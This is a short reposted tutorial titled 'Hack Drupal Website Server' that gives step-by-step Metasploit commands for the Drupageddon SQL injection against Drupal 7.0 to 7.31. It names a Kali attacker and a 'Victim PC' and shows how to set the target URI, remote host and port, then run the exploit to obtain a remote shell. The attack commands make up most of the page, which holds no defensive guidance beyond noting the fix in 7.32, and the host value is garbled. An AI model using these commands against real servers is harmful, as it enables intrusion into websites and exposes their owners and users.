Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection

Datetime:2016-08-23 00:16:08         Topic: SQL Injection          Share        Original >>
Here to See The Original Article!!!

This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

  Exploit Targets

Drupal 7.0


Attacker: kali Linux

Victim PC: Drupal 7.0

Open Kali terminal type  msfconsole

Now type  use exploit/ multi/http/drupal_drupageddon

msf exploit( drupal_drupageddon )> set targeturi /drupal/

msf exploit( drupal_drupageddon )> set rhost 9 (IP of Remote Host)

msf exploit( drupal_drupageddon )> set rport 80

msf exploit ( drupal_drupageddon )> exploit            


Put your ads here, just $200 per month.